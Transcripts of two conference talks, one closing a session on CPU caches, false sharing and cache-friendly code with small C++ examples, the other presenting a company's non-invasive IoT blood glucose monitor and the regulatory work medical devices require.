That means that the other addresses near A are probably already in cache, either because they're on the same cache line, which means I brought them in when I brought in A itself, or possibly because they were prefetched because there was a pattern of accesses that the hardware was noticing, so it did some prefetching for me. Another implication, predictable access patterns count. So if you are walking through an array, for example, going through in some beginning to end, or end to beginning, those are the cache friendliest traversals, then the hardware is going to be able to pick up on it. On the other hand, if you have something like a linked data structure where you're following random pointers jumping around in memory, that is the equivalent of declaring war on the cache subsystem. It cannot predict what your next access is going to be, which means the prefetching is not working for you. You're probably jumping from cache line to cache line, and as a result, when you are trying to have the fastest possible data structures, you don't want a linked data structure. At the end of the day, the hardware is dumb, the only thing it knows about is an array. Arrays, good. Everything else, no idea what it means. This also means that a linear array traversal, usually from beginning to end, or from end to beginning, it doesn't really matter, is extremely cache friendly. It's got great locality, you're going from one element to the next, which means you're walking down a cache line. It's got a great set of patterns, which means that the hardware can figure out what you're doing and start prefetching for you. And what this means is that if I have a linear array, excuse me, if I have an array and I'm doing a linear search from beginning to end, that can be a lot faster in practice than a binary search, for example, on a sorted data structure, or I assume a heap-based data structure. 
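A sketch of the two lookups being compared, using standard library calls. For a sorted `std::vector` they return the same answer even though their memory access patterns differ: `std::find` scans sequentially (prefetch friendly), while `std::binary_search` jumps around:

```cpp
#include <algorithm>
#include <vector>

// O(n) lookup, but touches memory in a predictable linear pattern.
bool linear_contains(const std::vector<int>& v, int x) {
    return std::find(v.begin(), v.end(), x) != v.end();
}

// O(log n) lookup; v must be sorted. Each probe jumps to a distant
// element, so successive accesses usually land on different cache lines.
bool binary_contains(const std::vector<int>& v, int x) {
    return std::binary_search(v.begin(), v.end(), x);
}
```

For small and moderate n, the linear scan's cache friendliness can make it the faster of the two in practice, which is the point being made here.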
If I have a sorted array and I do a look up inside the sorted array, which is log n, that can be faster than an O of 1 search, for example, of a heap-based hash table. Now, I want to point out that computer science is legitimate: for a large enough amount of data, when you go from logarithmic lookup time to constant lookup time, constant lookup time is going to be faster. Talk to people who are dealing with large amounts of data, Google, Facebook, the NSA, all these places that are dealing with a large amount of data. By the way, I'd like to personally apologize for Google and Facebook. So people working on that amount of data, they have bigger, they literally have bigger problems to solve. Even for all of them, you have to take this stuff into account at some level anyway. But as I like to put it, at the end of the day, big O is going to win, but hardware caching takes an early lead. So for more moderate amounts of data, the hardware makes a big difference. Now, on modern hardware, it is very common to have multiple cores in one processor. So I told you before that on the particular processor inside this machine, the Core i7 architecture, there's four cores. So let's suppose I've got a four core machine, and I just want to look at two of them right now. So here's a couple of cores here. Now, let's suppose that I've got a multi-threaded program, so two of the threads happen to be running on different cores. And it turns out that one of the threads has read a particular piece of data from the main memory into its cache. Maybe it was doing a read. So let's just assume for purposes of discussion that here it is living cosily in the level two cache on core number zero. But it turns out that another thread working on the same problem, perhaps, has also either read or written, let's just assume it was a read, this particular chunk of data. So it has also happened to be sitting in its level two cache, let's say. 
So now we have a situation where we have conceptually a single piece of data. There's only one conceptual piece of data. It just happens to have been duplicated into the caching subsystem as an optimization to reduce latency. So let's assume that core zero does a write to that address. And let's assume that core one does a read of that address at the same time. So the question is, what is the value that is going to be read by core one, the old value or the new value? I mean, there's two copies of the value here. But conceptually, as a programmer, we're not thinking, gee, I think I'll program this so that it gets spread across three levels of cache on four different cores, which means 12 caches and suddenly I'm confused. How many people have to program like that? That is the correct answer, zero, perfect. All right, no one has to worry about that. The reason nobody has to worry about that is because caches are a latency reducing optimization that is inside the hardware. There is only one virtual memory location with the address A. From the mental model of programmers, there is only one chunk of memory that has the address A in it. And it only has one value. All that hardware stuff is supposed to be completely hidden from you. Now, it turns out that in the hardware, when one of the cores writes to its copy of the cached value, magic ensues that invalidates all the other copies simultaneously. And there's hardware engineers who devote their entire careers to finding ways to make that work quickly. There's more than one way to do it. So that happens automatically. As software developers, you do not need to worry about this, which is good because really life would be much more miserable if you did. Well, I need to qualify that. 
As long as you engage in the proper synchronization, so in every programming language that I'm familiar with, if you have one thread writing some data and another thread reading the data at the same time, so you haven't used any kind of synchronization to keep them from stepping on one another, bad things happen. That's called a data race. So assuming that your programs don't have data races. So you're using a mutex or using an atomic. You're using some kind of a message passing scheme. Assuming that you are following the rules dictated by your programming language to make sure that you get well-defined behavior. As long as you do that, you never need to worry about the hardware. On the other hand, if you program in some lower level systems language, C++ or C or D or other languages as well, anything that kind of has to get down on the hardware. Most of those languages basically say if you have a data race in your program, where one thread's doing a read, another thread's doing a write and it's not synchronized, those languages usually say results are undefined. We cannot predict what you're going to see. The reason that they cannot predict what you're going to see is because the hardware is going to be doing all kinds of weird stuff because the fact is on the hardware there are multiple copies of this data. That is why the language doesn't say well this is what's going to happen, because it literally does not know. So the underlying hardware is why you get undefined behavior. Now the thing is, assuming that you have followed the appropriate synchronization so that you have no data races in your program, this notion of what is known as cache coherency, making sure that different caches offer your software a coherent view of the values in memory, is handled completely automatically by the hardware. But it takes time. It's not free. I said there's hardware engineers who devote their careers to making sure that this stuff happens. 
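A minimal example of "following the rules": two threads share a counter, and using `std::atomic` makes the concurrent increments well defined, with the hardware's coherency machinery doing the rest invisibly. The function name `atomic_sum` is my own, not from the talk:

```cpp
#include <atomic>
#include <thread>

// Two threads each add `per_thread_increments` to a shared counter.
// Because the counter is std::atomic, there is no data race and the
// language guarantees the final value, even though the hardware is
// shuttling the cache line between cores behind the scenes.
int atomic_sum(int per_thread_increments) {
    std::atomic<int> counter{0};
    auto work = [&] {
        for (int i = 0; i < per_thread_increments; ++i)
            counter.fetch_add(1, std::memory_order_relaxed);
    };
    std::thread t1(work), t2(work);
    t1.join();
    t2.join();
    return counter.load();
}
```

With a plain `int` instead of `std::atomic<int>`, this same program would be a data race and its result would be undefined, which is exactly the distinction drawn above.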
Nobody's found a way to make it happen instantaneously. In some cases we are victims of the fact that the speed of light is limited, but that's a whole other problem. And this leads to a new problem. So let us suppose here on core zero, here's a cache line here. Now let's assume that core zero is only looking at address A. And let's assume that core one is only looking at address A plus one. So I have two cores. They are accessing independent pieces of memory. There is no data race here. One core is looking at address A. Another core is looking at address A plus one. There is no data race. There is no need for mutexes. There is no need for atomic instructions. Everything is hunky-dory from a behavioral point of view. The problem is, if they both happen to end up on the same cache line, then the hardware can't tell that they're independent pieces of memory, because cache lines are read and written as a unit. So if I have two cores, both for example writing the same cache line, the hardware is going to think that every individual write invalidates the other copy of the cache line in somebody else's cache. Herb Sutter refers to this as cache ping-ponging. So one thread does a write that invalidates this other cache's copy even though there is no conflict. This cache does a write, it invalidates this copy. And that means you're going back out to main memory or you're doing some other kind of synchronization at the hardware level in order to make sure you get a consistent view of memory. This is known as false sharing. False sharing arises when you have independent threads that are accessing the same cache line. There is no data race, you don't need to use a mutex or anything like that. The problem is the hardware doesn't know that. You're slamming on the same cache line. So that's false sharing. Any questions about false sharing? Pardon me? Alright, so the question is, if you have false sharing, how do you address it?
Fundamentally what you need to do is to either, well actually, let me defer the question, because I want to talk about the factors that contribute to false sharing, because then we can say if any of these factors is not true then you have eliminated false sharing. So let's go back to Herb Sutter's example with this notion of false sharing. So this is the original code that Herb Sutter showed. So in this case here we have an array of results, and every one of the threads, all 24 because Herb has 24 cores, are saying ++results[P] whenever they find an odd number. Now that's a read-modify-write operation. But if you have two threads where one of them is doing plus-plus on its index, maybe index number three in the array, and another thread is doing plus-plus on its index, which is maybe number two in the array, they're independent so there's no conflict, but they're probably on the same cache line. As a result this is slamming the underlying hardware system, which is constantly trying to update all these different copies of this index. So with 24 cores, that array is probably duplicated 24 times in 24 different caches, and every individual write is going to invalidate all 23 other caches even though there's no conflict. That also explains why the simple solution works: creating a local counter inside the thread. Now this local counter is going to be on the individual thread's stack, which means it's probably not on the same cache line as anybody else's counter. And now all the work of incrementing the count is occurring on the local variable inside the thread's stack, which means it probably doesn't conflict with anybody else. There's no false sharing there, and then when each thread is done, yeah, they still have to access results[P], but instead of slamming on it the entire time that they're trying to count how many odd numbers, what they're doing is making only one write.
So there still could be some false sharing but it's going to be for a very short period of time. That explains why this seemingly peculiar optimization of going from writing directly to the array to going to writing through a temporary in some sense makes things run a whole lot faster. It's worth again taking a look at how this manifests itself in terms of scalability results. So this is the scalability or I guess I should say the lack of scalability if you have false sharing and this is the scalability if you do not have false sharing. Now in this particular case an example of how to solve it was to simply prevent all those threads from hitting that same chunk of memory simultaneously. So the problem of false sharing it tends to arise only as long as all of the following things are true. The first thing is you have to have independent variables or independent values falling on a single cache line. So if you have two things that are next to one another in memory and you separate them so that they're no longer next to one another in memory that is one way to eliminate false sharing. Where different cores are concurrently accessing that particular cache line. If somehow you can set things up so that only one core is accessing a cache line there's no such thing as false sharing within one core. It only happens if you have multiple copies because it's the cache coherency that's the problem. If there's only one core that's accessing a chunk of memory it'll only be in one cache. And this is only going to matter if it occurs frequently. If it's every once in a while it's not likely to be a performance problem which is why Herb's solution works. And at least one of them is a writer. Readers don't conflict. Only readers and writers or writers and writers conflict. So to get now to your particular question we now understand ways to eliminate this. Basically if we can get any of these four things to not be true we don't have to worry about false sharing any longer. 
So in the case of Herb Sutter's example, what he did was he took two values which were close to one another in an array. First he separated them by putting essentially one of them in the thread stack frame. So that separated them, and what that meant was when he did do the write to the array, it wasn't frequent any longer. I want to point out that pretty much all kinds of data potentially are susceptible to false sharing. So anything that is statically allocated, so for example global variables. If you say global int x, not that you would, but think about the people you work with who didn't come to the conference. What are they doing while you're learning about CPU cores? So if you say a global int x and a global int y, they could very easily end up on the same cache line. So if it turns out that they're being hammered by different threads that fulfill these criteria, you can have a false sharing problem. Or if they're static at file scope, for example. Or heap-allocated data. Normally people think, well, I couldn't possibly have any problem with heap allocation. But if it turns out that I heap allocate this, and then maybe I allocate this and deallocate it, and allocate it and deallocate it, and allocate it and deallocate it, and oops, it's sent over here. So I could have two completely independent, temporally independent chunks of memory that by bad luck end up on the same cache line. And the chances of this occurring increase if you are for example writing a clustering memory allocator. Assuming you're working in a language where you can do that kind of thing. But this can happen in languages with managed memory as well. Because the garbage collector doesn't know for sure, or the compactor doesn't know for sure, what the lifetimes of things are. It will try to avoid this, but it is still possible for it to occur. If you have an automatic variable, so something which is local on your stack, normally you're not going to get false sharing with some other thread.
Remember, you have to have multiple threads actually accessing these things for them to be a problem. Normally things that are on the stack frame of an individual thread are invisible to other threads. Which means they don't suffer from false sharing. On the other hand, if you have, let's say, a local variable on your stack frame, and then you decide to spawn a thread and you pass a pointer or a reference to it, so now the other thread has a way to get at your chunk of memory, that can lead to false sharing as well. Any questions about false sharing? Okay, so the observation here is that there's this lovely little performance jump right here. And so the question is, is that related somehow or is that completely independent? I don't know for sure, but here's my suspicion. My suspicion is that that jump right there corresponds to a break in a cache line. In other words, the array was broken across two cache lines, and that's the end of the first cache line and the beginning of the second cache line. So you'd have to do more experiments to find out for sure, but that's my suspicion. Which means if you run it multiple times with multiple compilers, you actually get different results. If you rearrange the order in which things are declared, it might get moved around on the cache line, and then the shape of that could change a little bit. All righty. So regarding false sharing, this is a comment from one of the performance guys at Microsoft, and some of these people wonder why I quote from Microsoft all the time. They blog more than other people. That's why. So anyway, he says during Beta 1 performance milestones in Parallel Extensions, most of the performance problems came down to stamping out false sharing in numerous places, which is kind of scary. Most of the performance problems, not the occasional performance problem, but most of the performance problems. So false sharing is worth knowing about, plus it's just kind of a cool term.
So to summarize where we are, the first thing is that as far as the hardware is concerned, small is the same as fast, or what I really should say is, big is the same as slow. There's no time-space trade-off in the hardware. Locality counts: you want to stay in the cache, both the instruction cache and the data cache. And predictable access patterns count: you want to be prefetch friendly. That's the general summary, but what does that mean in terms of trying to get your programs to get along well with the hardware? The first thing is, for data, where it is practical, consider employing a linear traversal of an array. That's what the hardware really likes. I was talking with a guy at a particular financial services company. They do algorithmic trading, which either is the end of the world or providing needed liquidity, depending on your feeling about algorithmic trading. And he goes, well, I don't know about blah blah blah data structure, but I know that an array is going to beat it. Which is not always true, but to a first approximation it is actually true, because the hardware loves array traversals. That in fact is the only data structure the hardware loves. So if you can employ a linear array traversal, that's what you want to do. Second thing is you want to use as much of a cache line as you possibly can. What you don't want to do, for example, is read an entire cache line, use only a tiny little piece of it, and then move on to some other cache line. Now remember, that was the problem we had with a column-major traversal of a matrix, but here is another example of it. So this one was contributed (I am still alive, I can't believe that) by Bruce Dawson. He used to work for Microsoft, and in particular he worked in the Xbox division. So he would work with developers and with companies who were developing video games.
And so in video games it is not uncommon to have an object and objects can be alive or dead for any one of a number of reasons because it's a video game. So there'd be a Boolean saying whether this thing is live and might have actually been a bit field. So then we'd have for example a vector of objects and then what you would have imagine this is in your game loop in your rendering loop. Well you got to figure out what you have to draw on the screen or what you have to move or update the physics for whatever it happens to be. So for every one of those elements if the object is alive you want to do something with it. Now think about what this means. You're reading an object now the object has a multiple fields right. One of the fields is this Boolean but it probably has some data before the Boolean maybe some data after the Boolean. So when you read in the object you're probably occupying oh let's just assume it's a 64 byte cache line. You then check the Boolean which worst case might only be a bit field and if you find that it's zero you throw the entire cache line away and move on to the next object. So this has some interesting implications. Now let's suppose that your Bruce Dawson you're doing some performance analysis and you see this kind of thing in a game which he said was very common. How do you fix that? Yes. Pardon me? Arrays. Arrays of. Okay so I assume what you mean is you take those Booleans out of the objects you put them into some separate array for example of Booleans. So let me translate here because I this is the way that you do it. You go to object-oriented programming and you kick it in the teeth. You say this whole nonsense of taking data and functions and bundling them together. No we're going to rip out the data now and stick it in an array that nice high-level data structure. Why? Because the hardware likes it. Did you have a question? Okay so essentially we can split the object maybe into multiple pieces. 
The essential data, which maybe is very small, and something else. And that's consistent with the same idea. But the interesting thing is that for decades now, people have learned that what you want to do is have objects. They represent these really nice abstractions, we're bundling the functions and the data together so it'll be really easy to read and write and reason about the programs. All of which is true, but remember the hardware. So this is not friendly to the cache in many cases. So there's actually other schools of design which involve trying to take abstractions and yet, at the bottom of the stack, trying to make it so that the data is also very CPU friendly. Yeah. Okay, so Kevlin's suggestion is that you can use the Objects for States pattern. Thank you, Collections for States pattern. You can tell I'm not as familiar with it as I might be, and which he says allows you to remain object oriented but is consistent with using the hardware, without going against the grain of the hardware. So nevertheless, the observation is that if you want to get maximum performance, you're going to have to take the behavior of the hardware into account when you are designing your data structures. And the last thing you can do is you need to be alert for false sharing in multi-threaded systems. I would love to be able to tell you that there is some great set of tools which will go, oh, you got some false sharing going on there, let me tell you how to fix that. And currently we do have such a tool, it's called an experienced senior engineer, who looks at your scalability and goes, oh, you got some false sharing going on there, let me show you how to fix that. There are tools which can give you some information, for example the one Bruce Dawson was talking about.
They had a special tool that they actually made at Microsoft for the Xbox division, and what it would do is it actually showed, when a cache line is brought into the cache, what percentage of the cache line is used before it gets evicted. That is not a standard tool, but that was something that they developed to be able to identify these kinds of problems. So currently you can get some information, for example, from Intel's VTune, and there's some other things that you can do, but alas, this is still kind of at the level where, if you are used to programming in an unmanaged language and you suddenly see completely weird results going on, experienced people in an unmanaged language go, oh, it's probably a wild pointer that's writing beyond the end of an array or has miscalculated an address. I mean, it just looks like that after a while. So false sharing, you just have to be aware of its existence if nothing else. So that's for data. For code, the first thing is you want to fit your working set in the cache. So this also has some other interesting consequences. Let us suppose I have, let's say, an inheritance hierarchy. I've got a base class and I've got three derived classes. So we've got derived class one, derived class two, derived class three, and what I want to do is put them all in a collection. So I've got a collection of base class objects, or pointers to base class objects, but each actually is going to be of type one, type two, or type three. And now what I want to do is walk down that collection, invoking some virtual function, some virtual method, on every element of the container. So this is a classic use of runtime polymorphism in object-oriented systems. So let's assume the function we want to call is f, because that's just what functions are called.
So I go to the first element, I make the polymorphic call to f. Let's assume it is an object of type one. We go down to the class of type one. Guess what, f's implementation for type one is not in the instruction cache. No problem, we fetch it from main memory, we put it in the instruction cache, we execute f. Yes! We go to the next element of the container. Because we are unlucky, its type is number two. Alas, we do not have f's implementation for number two in the instruction cache. No problem, we go to main memory, we get the instructions, we put them into the cache, we execute them. Yes! We go to the third element. The third element, of course, is of type three. We don't have f's implementation for type three. We go to main memory, we want to put it in the cache. The cache is too small, it will not fit. No problem, we evict all those old instructions from the f of type number one, because we haven't used them in a long time. We write in number three, we execute number three. We go to the next element. Of course, it's now of type one. You can see where this is going. This is not, by the way, a theoretical problem. Many people, especially in the video game industry, have run into this kind of thing. There's a variety of ways you can solve the problem, but one of the ways, for example, is to sort the sequences by type. So you could have three different containers: all the type ones, all the type twos, all the type threes. Or you can actually put them all in the same container, and that'll still work, as long as all the ones are at the beginning, all the twos are in the middle, and all the threes are at the end. But again, it has to do with keeping track of what's going on in the instruction cache. That's the kind of thing you're trying to avoid. You've often heard, I hope, that the fastest kind of code is straight-line, branch-free code. Now you know why. Straight-line, branch-free code is really, really friendly to the prefetcher in the instruction cache. If you're just going instruction, instruction, instruction, no branches, it's prefetching
all the instructions that you're probably going to need. So, straight-line code: if you know that you have some code that has to run really fast, but there's a few cases that are exceptional, that are unusual, what you want to do is do some tests for those up front and make them non-inline function calls, to get them out of the fast path, so that everything else is straight-line code. That'll be fastest. I'm almost out of time here, so I'm going to defer the questions till the end of the talk. Inlining: you want to inline cautiously. The good thing about inlining is that when you inline a function call, you're not making a jump to subroutine, which means you got rid of a branch. Yes, we hate branches, branches are not good for instruction prefetch. Furthermore, inlining allows compilers to perform additional optimizations, having to do with context- and call-specific optimizations, so that's really nice. The problem with inlining is that if I have a function call in 20 different places and I inline it in 20 different places, I get the same code in 20 different places, and now I can overflow the size of my instruction cache. So trying to find the right balance with inlining can be tricky. There's a couple of optimizations that compilers or build systems offer that are worth knowing about. One of them is PGO. PGO stands for profile-guided optimization. It is available in at least many compilers for unmanaged languages. The nice thing about PGO is it actually does a lot of these optimizations for you automatically, so you don't have to do them yourself. And WPO stands for whole-program optimization, which again is a set of optimizations. So if you have tools in your build system which can perform instruction rearrangement, figure out what is hot code, what is cold code, that kind of stuff, you want to take advantage of those things whenever it is possible. So if you are interested in further information about CPU caches, sort of the heart of the machine, the first place I always go
is What Every Programmer Should Know About Memory. It's where I go if I want really detailed information. I'm not sure every programmer really needs to start on page one; it starts with transistors and it goes from there, and I didn't feel compelled to understand exactly how transistors work, but it probably would have improved my understanding. For anything to do with CPU caches, that's the first place I go. That's really good. And I think everything else you can probably take a look at later. So we have about one minute, so any questions about CPU caches? Yes. Correct. Okay, so the observation is, let us suppose that I've got a thread running on a core, and now it gets swapped out, for example. So all of its instructions and all the data that it's using are in the cache for that core, and then the next time its time slice comes around, it gets rescheduled to run on a different core, where now everything is cold, and this can obviously make it run slower. So the question is what can you do about that kind of thing. Normally, if you have a manual level of control, there's something known as core affinity. So for example, if what you want to say is this thread should always run on this core and not be permitted to migrate, then affinity is a way to express that. Now, thread scheduling subsystems that have to do this kind of stuff are well aware of that problem, so they're going to try to avoid migrating a thread from core to core if they can avoid it. But if you've got a lot of threads and there's oversubscription, sometimes you're going to lose. But I think the standard low-level approach, assuming you have access to an API that gives it to you, is to use core affinity. We have time maybe for one more question. Yeah, okay, so the question essentially is, I made the comment that straight-line code is friendliest for the prefetcher, and the question is, isn't it also sort of friendly for the cache itself, because for example when you read in
64 bytes that might include several instructions with no branches and the answer is yes so the two things clearly they work in concert so the basically when you read in a cache line you're hoping to get multiple instructions on the cache line and as long as there's no branching you're going to be able to execute all of them and I think we are out of time now so thank you very much please let the conference as well as me know what you thought of the talk by picking up the little green pieces of paper or other colors and putting them in the bin thank you
No matter what programming language or technology you use, if your software fails to make effective use of the underlying CPU caches, your system's performance will suffer. A lot. This session provides a wide-ranging overview of CPU caches, how they operate, and how that affects high-level decisions on things like data structures and traversal strategies. Both single- and multi-threaded execution are considered. Specific topics include different cache types (data, instruction, TLB); private and shared caches; cache lines and speculative prefetching; false sharing; and cache-friendly program organization, data structures, and traversal strategies. If you care at all about performance, the information in this talk is essential.
10.5446/50511 (DOI)
My name is Dian Larsen. I am with a company called Prediktor. I'm here to talk to you about a medical device. It's Internet of Things, but with special considerations if you want to have it classified as a medical device, used in medical settings. So when we got asked if we wanted to have a talk on the Internet of Things, I was thinking perhaps it was just tweeting toasters all day, but it seems to me like there's actually a lot happening with Internet of Things today. I come from a company where we are very used to Internet of Things, at least some kind of net and some kind of things. Does anyone know what this is? Probably not. It's for making huge silicon crystals. You see, there's a little guy in the left corner. So that's them pulling out big crystals from these machines. So we do some of the control on these machines, these things. And they are hooked up to the Internet. So we're thinking we've been doing IoT for years. This is the chokes and the valves on Ormen Lange, a huge oil and gas installation. So we've been doing control on these. And these are hooked up to the Internet as well. This is a paper factory. So we do control and surveillance and logistics on these. And then we have this one. I should have a pointer. You see the red stuff in there? That's meat, and the shiny tube up there, that's our device for meat analysis. So it's a Windows PC and a spectrometer and a light bulb. So we emit light and read the infrared light coming back from the meat into the spectrometer. And then by doing some machine learning stuff, we can tell the guys if they are producing with the right amount of fat, the right amount of protein, and the right amount of water. We do this for milk and cheese and grain and a lot of stuff. And these can be hooked up, a bunch of them, across an enterprise. And they work together and they share their calibration and models. So that's real Internet of Things, because all this happens with the devices talking to each other.
We also have some software for helping this to happen. This is acquisition software. We can get signals from just about anything. If any of you were at the OPC UA talk next door, this is also an OPC UA server and a client. And this is designed to acquire like 100,000, 200,000 signals on a small computer. We also do process modeling. This is important because this is what I'm going to talk about for the medical device. So this is what we do: we model physical processes to try to figure out if we're able to estimate something useful by taking all the signals in from that acquisition software into the model and seeing if we can estimate something new. We have models for this and we also have some tracking for logistics. And now to the important part. This is a picture from 1980 or 1979. There's probably a few of you who know this guy, Steinar Sælid. He's a cybernetics professor. So he's sitting there with his, well, this is a local area network of things, trying to get a boat to stand still in a storm. So it's dynamic positioning. And this, as I said, this is 1980, I think. Four years ago he had a stroke. And one thing you do with people who have a stroke is to measure the blood glucose. I don't really remember why, but they had to prick his finger all the time. He is the most curious, he's always curious. I don't know any person that's more curious than him. So he was thinking about all this pricking of his finger. And he was thinking about the meat. And he was thinking about the physical processes. So he was thinking, I can use this, I can use the stuff we have done before, to measure glucose in the blood. So he was doing this because of a stroke, but he was thinking a bit further ahead. There's a reason for doing glucose. One in 11 adults has diabetes. I guess there's about 30 or 40 people here, so there's perhaps three, four people here with diabetes. Half of them don't even know that they have it. And there's quite a few people dying from it.
For diabetes, there is a rule, something called the rule of halves. So you have about 400 million people who have it. Only half of them know that they have it. Of the ones that know they have it, only half receive treatment. For half of those people, the treatment is effective. And for half of those again, the treatment gives good results, so that they are in control. So we decided we should take that big tube and some of the software and make a device, a medical device, so that you can use it in hospitals, and so we can say that we can measure your glucose continuously without you having to stick your fingers. Because that's important. Diabetics have to either stick their fingers 10 to 30 times a day, or have some implant in the body that they need to change every two weeks or something. So it's very costly as well. 12% of global health expenditure is used on diabetes. And much of that is because of situations where people are not in control. Okay, so we have tried to make this. We made the first version. Well, actually the first version was this big tube, where we had just put the optical fiber in and held it against the finger. But this is the first embedded version. And this is in use, and there were some dreams about how it should look. This is a rendering, the one on the right. Then there was a new rendering where we were thinking of not having a display, but that made it hard for the users. And then we did clinical tests with the one up to the right. So we did them on patients, I think it was 12 diabetics in Trondheim, to get the clinical proof that we are actually measuring glucose. Because this is something that's been tried a lot: to actually measure the glucose. We use infrared spectrometry, and the information is in the fourth decimal. So there is much more noise in the signal than there is actual signal. But that's doable because of the modeling. So this is the current version.
And as you can see, we do the electronics production ourselves. So we have designed the electronics, and we make the electronics, not the board itself, of course. And the red bag is the ESD protection, after we got ourselves a production line manager, because we had some ESD, electrostatic, troubles. So this is from Teknisk Ukeblad, a Norwegian technical journal. And this is one rendering, and this is the current version, and that's the one I'm wearing now. This one. So my blood glucose now is five millimoles per liter, and that's good for a healthy person. And I bet a diabetic would be very happy to be flat on five. So I was thinking, since there is no camera here, I was trying to get you to see the device. You'll see I have five, and there's three quarters of battery left. My glucose is five, and there's buttons here for adding events. If I take insulin, and I want to tell the modeling this, I can do that. And I can tell it if I stick my fingers to calibrate, because if it's unsure, it will ask you to stick your finger. Yeah. So how does this all work? Because this has been tried a lot of times before, but we have finally figured out how to make this work. So this is the bottom. Let me take off the device and show you. This is the underside of the device. You see the four dots there? Those are bio-impedance sensors. So we're sending a high-frequency voltage into the skin. And we have an optical sensor, and we have an LED package. So we send out infrared light and measure how much is coming back in various wavelength bands. And we try to send a very small current into your body to measure as well. And then we do sensor fusion with this to predict how much blood glucose you have. In addition, we have a metabolic model. This is modeling of the bodily processes that happen in you. It's used as a kind of filter or verification. So, if you're a math person, it's a Kalman filter doing all this. Yes. So this all works fine, but it does not work all by itself.
The next slide is also called under the hood, but I don't know what we should call it. This is what we need to have. We have the device, and for it to operate correctly when I get it the first time, it needs a monitoring period. The device has to figure out what's special about me compared to other people. So it will just sit on my arm, I will tell it how much blood glucose I have, and it will measure my spectra and my bio-impedance. That will be shipped to a back end. We have a back end running at our office and at a couple of cloud providers. So that's normal machine learning, supervised learning, going on up there. When it has figured you out, it will ship the models and the parameters made for you back to the device, and then it's standalone, as I have it now. So now it works just for me. If I put this on another person, it will not work. It will just say: I can't understand who you are. This is a calibration run that's needed individually. As of now, we connect either using USB on a computer, which we use when we want a lot of telemetry from the electronics, because we do some surveillance and monitoring there as well, or we use BLE, low-energy Bluetooth. Any questions about this or the previous slide? Okay. Now to the thing that makes it a bit more difficult being a medical application. I have drawn an axis. This is how stringent, how strict, the rules are for you to operate. And to the right, that's the cost of implementing the next feature you thought of. You can make a web page with something going and just put a beta stamp on it, and it doesn't cost you anything other than just writing the code. That will be very cheap. For medical applications, you are up at the highest level. Adding a new feature to a medical device is extremely costly. You have to do all the verification of quality and risk. You have to get trials approved by ethical committees.
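The personalization loop described above, supervised learning on the back end from finger-stick labels, with the fitted parameters shipped back for standalone on-device use, can be sketched as follows. The linear model, the feature values, and the "unknown person" rejection threshold are all illustrative assumptions, not the real system:

```python
# Sketch of the per-user calibration loop: the device collects raw sensor
# features plus finger-stick glucose labels, the back end fits a personal
# model, and the fitted parameters are shipped back for standalone use.

def backend_fit(features, labels):
    """Least-squares fit of glucose = a * feature + b (toy personal model)."""
    n = len(features)
    mx = sum(features) / n
    my = sum(labels) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(features, labels))
    var = sum((x - mx) ** 2 for x in features)
    a = cov / var
    return {"a": a, "b": my - a * mx}

def device_predict(model, feature, known_range=(0.0, 2.0)):
    """On-device prediction; refuse if the input looks like another person."""
    lo, hi = known_range
    if not lo <= feature <= hi:
        return None  # "I can't understand who you are" -> ask to calibrate
    return model["a"] * feature + model["b"]

# Calibration run: paired (sensor feature, finger-stick glucose) samples.
feats = [0.2, 0.5, 0.8, 1.1, 1.4]
sticks = [3.0, 4.5, 6.0, 7.5, 9.0]
model = backend_fit(feats, sticks)     # supervised learning on the back end
print(device_predict(model, 0.6))      # standalone prediction: 5.0
print(device_predict(model, 5.0))      # out-of-range input: None
```

The design point is the split: training needs the back end's compute and labeled data, but inference needs only a small parameter set, so the device can run standalone once calibrated.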
You have to do the trials and have independent investigators look at the trial. You need to apply to a notified body to go through your quality and risk management system and check the actual tests. And you need to do a bunch of tests for biocompatibility and for risk. So this is a challenge when making medical applications and devices. But you can do something. You can use consent. You can tell a user: if you consent to this, you can do this and that. You can't do that with everything, though. You can't make a surgical robot and have a user just consent to using it. There must be regulations for medical use. And there's another step in this. That's more the community part. That's when you start using data from more users, combining it like you're supposed to in the Internet of Things. And we do that as well, for training. We can take models from a lot of people. We can sometimes figure out that a specific person has a model that will fit you better than your own. So that's a community. Our dream is to find that one special model that will work for a whole lot of people. That requires quite a lot of computing power. How much time do I have left? I just have a few minutes. Sorry. So the way we solve this: you take your medical device and you figure out the intended use. What are you going to use it for? If you say you're going to use it to measure glucose, don't measure anything else or try to do something clever, because that will violate your conformance. So the first thing is to make sure you know the intended use. And everyone who's working with it and writing papers and doing quality checks should know this. But you can also strive to deploy a separate system for each regulatory domain. That means you can have other functionality that's not the main use of the device. For instance, you can have notification of parents for kids with diabetes. The parents can get a notification.
That is not a medical device. That can be a separate use. So you need to make sure that you have a system that can be deployed per regulatory domain. You need to be able to take this compliant system, make a copy, make another system, and get that compliant. Because if you're going to make the whole system a medical device, you will fail, because it's impossible. And you kind of see this if you look at medical devices. They all look a bit dated. That's because the process takes a few years, and if you change anything, you have to go back and get re-certification. And then tip number three is: make your procedures, your software and your firmware in a way that allows tip number two to work. Obviously, I'm not going to make a completely new system from scratch for each of the pure medical use, the more private, non-medical usage, and something for the community. So, at work we have a competition. That's why the last slide is picture time. Can I take a picture? Because we're trying to figure out who gets the best picture of the device this year. So, if I can get some help from you. And it has to be a good picture. Can I get the hands in the air? Whaaaaa! One more. Sorry. Yeah, thank you. So I think I'm going to win eventually. I'd have to go to a mountain top or something to beat this. Are there any questions? Yes. Yeah, about the spectrometer: the price, or is it something you'd recommend a hobbyist to try out? Yeah, the question was about the spectrometer, and whether you can try this out as a hobbyist. It's not that expensive. If you see here, we have the round yellow part. That's not expensive. I can't tell you the price of the whole device, but it's not intimidating. It is really good if you're willing to do calibration. Because in this LED package we use infrared LEDs, and all of these need calibration and standardization.
